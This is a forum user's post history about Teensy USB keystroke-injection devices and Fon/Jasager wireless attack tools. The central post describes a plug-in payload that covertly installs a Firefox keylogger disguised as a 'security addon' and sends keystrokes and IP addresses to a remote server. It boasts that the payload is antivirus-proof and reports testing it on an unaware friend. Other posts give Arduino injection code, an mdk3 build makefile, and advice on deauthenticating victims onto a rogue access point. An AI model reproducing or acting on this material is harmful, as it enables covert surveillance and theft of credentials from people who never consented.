sandred
-
Posts
20 -
Joined
-
Last visited
Posts posted by sandred
-
-
Does anyone have the source code for this? The link is no longer working.
I have put them back. Let me know if you have a problem.
-
Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts?
If you have a folder C:\kl (may be from previous runs), then you have to delete it before running it again. Try that and try to plug it in with nothing else running on your computer, may be your computer is slow at multitasking and missing some keystrokes.
-
All the code does it is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to firefox "Hey there is a plugin that you need to load at C:\kl" and when firefox starts it loads the code . Once loaded, the plugin watches all the keystrokes made into browser and quietly posts them to the remote server. The php script is placed in the server, which then takes these keys sent and stores them to a file.
You do not need to load these files into teensy. All you need to do is compile the code in Arduino and flash the teensy with it. When you plug in the teensy, it just echos the code to the files and does the rest of that stuff. You can just try it as it is with out changing anything. you can always uninstall it after testing.
Yes the keylogger is very simple and very effective and completely undetectable as it is effectively just 2 lines of java script running inside a browser. I already field tested it on one of my friends computer and he does not think any thing ever happened at all when teensy installed it. I had to explain him the details and even after that he does not really believe thats possible. Well educate the masses I guess.
-
By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof of concept keylogger plugin installation for firefox. When teensy is inserted into usb, it uploads the plugin files into C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into firefox by adding registry key into HKCU\Software\Mozilla\Firefox\Extensions. If firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin(displayed as "Firefox Security Addon") loads when firefox starts the next time. If everything goes fine, it will be done in 10 secs.
The keystrokes are then sent to remote server (specified in the code). The remote server then captures the keystrokes, time stamps and ip stamps (Bonus! we get the ip too) the data and logs it.
Please keep in mind that this is by no means a polished or optimized code, bugs will exist. So watch out. I quickly copy pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this can not be implemented in a more sophisticated way for other plugin supported browsers and for all OS's. I would love to see somebody optimize it.
Download the code from here
http://karmetasploit.com/KL/AllFiles.zip
if you do not bother to change the server or just want to test it, then the logs are currently stored in this location:
http://karmetasploit.com/KL/logger.txt
Some plus points with these kind of keyloggers:
- It works behind what ever firewalls as long as Firefox gets the internet.
- 100% AV undetectable
- You can decide to log or not to log based on ip.
Why bother stealing cookies when you can get all the key strokes. :)
-
I was trying to get a feel for system delays and general programming flow when using teensy. So I thought I would just do this for the heck of it, and when I did it..... why not share it . It will make someone happy for sure. Understand the risks if you are planning to run it. Do not run on slow systems.
Few things learnt while doing this.
- Delays are so damm important and they are just varying from system to system. Almost need to think of slowest machines.That brings to my second point.
- Feed back from the system is critical, we need to figure out how to get some feedback from system.
/* .prints the obfuscated ascii heart .gets the heart into recognizable shape .says I love you .beats the heart <-- this may not work on slower machines ***Close all script/text/other programs with text input before running this. This program can be highly destructive if notepad is not launched for some reason. Use it at your own risk.*** */ #include <string.h> int ledPin = 11; int i,j,k; int nBeats = 5; //no of beats int fHigh = 14; // max font size int fLow = 6; //min font size int nSpaces = 20; // times to move the art to right int cn[] ={0,0,0,0,0}; //to store count of each char in the set to be replaced back char *rc[]= {"_"," ","I","Love","You"}; // replaced char set in original ascii art char *rw[] ={"66","99","1","4","3"}; // replaced with this char set to obfuscate it char *line[] = {"999999999999999999#991994999999999999999999999999#99199499", "999999999999#991994993..99999999999999#991994993...#", "99999999#991994993...#99199999999#991994993...#99199", "999999#991994993...#991994993...#9966666666666666#99199", "9999#991994993...#991994993...#99666666666666666666#99199", "99#991994993...#991994993...#99199Lo66666666666666#99199", "99#991994993...#991994993...#99199499Y666666666666#", "#991994993...#991994993...#991994993..6666#991", "#991994993...#991994993...#991994993...#9966#", "#991994993...#991994993...#991994993...#99199", "#991994993...#991994993...#991994993...#99199", "99#991994993...#991994993...#991994993...#99", "9999#991994993...#991994993...#991994993...", "99999999#991994993...#991994993...#991994993", "999999999999#991994993...#991994993...#99199Lov", "999999999999999999#991994993...#991994993...#", "999999999999999999999999#991994993...#99199499Y", "9999999999999999999999999999#991994993...#99199L", "9999999999999999999999999999999999#991994993.", "99999999999999999999999999999999999999#99199499", "999999999999999999999999999999999999999999#99199Lo", "99999999999999999999999999999999999999999999#99199", "9999999999999999999999999999999999999999999999#99"}; // ascii art to be printed void setup(){ pinMode(ledPin, OUTPUT); //set led delay(2000); // not needed } void loop () { delay(2000); //wait until hid is detected digitalWrite(ledPin, HIGH); //turn led on WriteMessage();//main funtion KeyCombo(MODIFIERKEY_CTRL,KEY_END); // just in case if the font change function fails, this will not destroy the printed ascii KeyPress(KEY_ENTER); delay(2000);//let them watch it for couple of seconds for(j=1;j<=nBeats;j++){ // make heart beat by changing font size Beat(); //this will not work on slower machines. } ChFont(10); //set back the font size to default 10 digitalWrite(ledPin, LOW); //tunr led off, we are done delay(50000); // delays the loop } void WriteMessage(){ runcmd("notepad.exe"); //open notepad in cmd line delay(2000); //wait until note pad is open sysMenu(KEY_X); //maximize note pad delay(1000); //wait until the command is finished ChFont(10); //set the font size to default 10 for(i=0;i<sizeof(line)/sizeof(line[0]);i++){ //loop through all lines of art for(j=0;line[i][j] != '\0';j++){ if(line[i][j] == rw[0][0]){cn[0]++;} //count each char to be replaced if(line[i][j] == rw[1][0]){cn[1]++;} if(line[i][j] == rw[2][0]){cn[2]++;} if(line[i][j] == rw[3][0]){cn[3]++;} if(line[i][j] == rw[4][0]){cn[4]++;} Keyboard.print(line[i][j]); //print each char letter by letter delay(20);//this produces something to stare on screen } KeyPress(KEY_ENTER); //new line } for(i=0; i<nSpaces; i++){ //move the whole art to the right, more like to the center of notepad KeyCombo(MODIFIERKEY_CTRL,KEY_HOME); for(j=0;j<sizeof(line)/sizeof(line[0]);j++){ //move one line at a time and loop through all. KeyPress(KEY_SPACE); //delay(50); KeyPress(KEY_DOWN); KeyPress(KEY_HOME); } } for(i=0;i<sizeof(rw)/sizeof(rw[0]);i++){ //replace char one by one KeyCombo(MODIFIERKEY_CTRL,KEY_HOME); KeyCombo(MODIFIERKEY_CTRL,KEY_H); delay(300); sysMenu(KEY_M); delay(300); //these are important delays ClicknMove(-127,127); //moves replace screen to bottom left end and takes it out of way delay(300); //these are important delays to make click work switch(i){ //replace accordingly case 0: Keyboard.print(rw[0]); KeyPress(KEY_TAB); Keyboard.print(rc[0]); for(j=1;j < cn[0]/2 -5;j++){ //replace char by char but go few less KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(100); //delay to stare at the action } break; case 1: Keyboard.print(rw[1]); KeyPress(KEY_TAB); Keyboard.print(rc[1]); for(j=1;j < (cn[1]/2 -5);j++){ KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(30); } break; case 2: Keyboard.print(rw[2]); KeyPress(KEY_TAB); Keyboard.print(rc[2]); for(j=1;j < cn[2] -5;j++){ KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(70); } break; case 3: Keyboard.print(rw[3]); KeyPress(KEY_TAB); Keyboard.print(rc[3]); for(j=1;j < (cn[3] -5);j++){ KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(70); } break; case 4: Keyboard.print(rw[4]); KeyPress(KEY_TAB); Keyboard.print(rc[4]); for(j=1;j < (cn[4] -5);j++){ KeyCombo(MODIFIERKEY_ALT,KEY_R); delay(70); } break; } KeyCombo(MODIFIERKEY_ALT, KEY_A); //replace remaining few with replace all delay(30); // important for above command to be finished. sysMenu(KEY_C); //close replace box. } } void Beat(){ for(i=6;i<=fHigh;i++){//increase font one size at a time ChFont(i); delay(20); } for(k=14;k>=fLow;--k){ //decrease font one size at a time ChFont(k); delay(20); } } void runcmd(char *cmd){ KeyCombo(MODIFIERKEY_GUI,KEY_R); // open run dialog delay(1500); // wait for it to open Keyboard.print(cmd); // enter some command KeyPress(KEY_ENTER); // exec some command } void KeyPress(int SomeKey) { Keyboard.set_key1(SomeKey); // set some key Keyboard.send_now(); // "press" some key // clear some key Keyboard.set_key1(0); Keyboard.send_now(); } void KeyCombo(int ModKey,int SomeKey) { Keyboard.set_modifier(ModKey); //set one or more modifier keys Keyboard.set_key1(SomeKey); // set regular key Keyboard.send_now(); // send strokes // clear keys Keyboard.set_modifier(0); // prep release of control keys Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times. Keyboard.send_now(); } void sysMenu(int SomeKey) { Keyboard.set_modifier(MODIFIERKEY_ALT); //set one or more modifier keys Keyboard.set_key1(KEY_SPACE); // set regular key Keyboard.send_now(); // send strokes // clear keys Keyboard.set_modifier(0); // prep release of control keys Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times. Keyboard.send_now(); delay(10); Keyboard.set_key1(SomeKey); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void ClicknMove(int x, int y){ Mouse.set_buttons(1,0,0); Mouse.move(x, y); Mouse.set_buttons(0,0,0); } void ChFont(int sz){ KeyCombo(MODIFIERKEY_ALT,KEY_O); delay(50); //magic number that works on my machine KeyPress(KEY_F); //open font window delay(50); KeyPress(KEY_TAB);//go to font size KeyPress(KEY_TAB);//go to font size Keyboard.print(sz);//give new size KeyPress(KEY_ENTER); }
-
Try dns tunneling with heyoka. It theoretically should work with existing open ports and give u RDP or ssh which ever is listening on ur master.
-
It was very interesting talk at Shmoocon 2010 about GSM MITM and using USRP and OpenBooTS. The only downside of it being the cost.
I came across this today and you might already be aware of it from ATT http://www.wired.com/gadgetlab/2010/03/att-microcell/ . I am not sure if that thing is hackable to begin with but they claim "Device is secure – cannot be accessed by unauthorized users, easy and secure online management of device settings" .... hmm sounds challenging and interesting. Any of you looked into it? May be or if we can use this instead of costly USRP module for GSM MITM?
-
Hey, Thanks for the quick replies...I'm still having some problems.
I followed the link http://karmetasploit.com/archives/55
My dhcp and the network files are exactly the same the examples in the link
before doing anything I used this line to enable wicd manager. Then launched the wicd gui and entered my AP's wpa2 key and was able to go online just fine.
/etc/init.d/wicd start
Back to the original problem, It seems that I'm unable to maintain both the wlan0 and eth0 at the same time. I only can connect to one of them at a time.
should I set my wlan0 (wireless) to master mode or something? or am I doing something wrong still?
Do not use wicd or wicd-client. If I remember it correctly wicd disconnects you from either one of them as soon as you connect to other. So if you want to test it and still want to use wicd, connect to internet as you normally do using wicd then right click on wicd client icon and completly exit it. Then test if you are still connected to internet. After that bring eth0 up using above commands and u should be fine. I believe if you dont exit wicd before bringing eth0 up it will disconnect u from wlan0. I think but I am not sure. try it.
-
Here .. This might help you. Post back here if you have any problems as I definitely got that working.
-
Sorry guys I forgot.... I will try to upload it to a rapidshare or some where like that.
I had a copy of it. I hope it is alpha 4. Here is the link.
-
I am new to this USB thing..so please bare with me.
So here are nice tools developed by DB. I downloaded them, made a iso containing all the tools, including a autorun.inf to launch them all. The thing that I dont understand is that, they are all on a "CD-ROM" drive that cant write data (aka dump) . So launching them is useless if they cant dump. How do you launch them from a writable portion of jump drive.
The only thing I can think of is to run a script that in turn launches the files. But how do you know in which drive letter the files really are? Could some one please get me started on "launching files"
-
Then how can it do both things at same time. You can only multitask(time share) I assume. If so, will it be fast enough? I will be interested to know how you are approaching this.
I'd agree with that but I'm going to put them both on the same because people are asking for it. There will be appropriate warnings. -
Best bet to get most of mdk3 and jasager is to run them on seperate fons. run legend/mdk3/aircrack on one fon..use it to deauth ur target client or ap. that forces ur victims to connect to jasager running on second fon automatically. it totally works.
Just installed "libpthread_0.9.28-8_mips.ipk".Now it works like a charm ;)
<3 <3 <3
-
thanks ! i was under the impression that it did not require new installs. now i got it.
-
Yea, I knew it would be pretty slow, but i just wanted to test a 100 word dict file. Anyways I got it running on windows. Thanks
-
When I tried to upgrade...I got this error
root@OpenWrt:~# ipkg install jasager_2.1.ipk
Upgrading jasager on root from 1 to 2...
Nothing to be done
An error ocurred, return value: 1.
Collected errors:
ERROR: Cannot satisfy the following dependencies for jasager:
ruby-core ruby-rexml
What should I do?
-
I want to run John on FON for brute forcing WPA (pipe it to aircrack). I currently dont have a linux installation to "Make" the file from source. Is there quick way to get john running on FON? Any ideas or help is appreciated.
-
Thank you !
-
I am trying to package the new version of MDK3 V5 into a ipk file but with no luck. Could you please explain the process in depth or upload the ipk file somewhere?
Thanks
I figured out how the Piranha firmware built the mdk3 package today and I was able to I compile my own package :D . mdk3 does kind of work along side karma but there are some minor issues. For example, when I tried setting up jasager on channel 6 and set mdk to channel hop it crashed my Fon+ after a minute or so <_< . However, it did run somewhat OK when both were set to the same channel. Unfortunately, I'm unable to upload the package to the forums. But I'll give everyone the makefile so that you can build it your self and maybe some one will be kind and upload the package for the people that don't know how to build it.include $(TOPDIR)/rules.mk PKG_NAME:=mdk3 PKG_REV:=5 PKG_VERSION:=v$(PKG_REV) PKG_RELEASE:=1 PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.bz2 PKG_SOURCE_URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/ PKG_SOURCE_SUBDIR:=$(PKG_NAME)-$(PKG_VERSION) PKG_SOURCE_VERSION:=$(PKG_REV) #PKG_SOURCE_PROTO:=svn include $(INCLUDE_DIR)/package.mk define Package/mdk3 SECTION:=net CATEGORY:=Network TITLE:=MDK3 URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/ SUBMENU:=wireless endef define Package/mdk3/description Tool to exploit wireless vulnerabilities endef define Build/Configure endef define Package/mdk3/install $(INSTALL_DIR) $(1)/usr/sbin $(CP) $(PKG_BUILD_DIR)/mdk3 $(1)/usr/sbin/ endef $(eval $(call BuildPackage,mdk3))
[Version 1] White Hat Examples?
in Classic USB Rubber Ducky
Posted
Tried this?
http://www.hak5.org/forums/index.php?showtopic=16469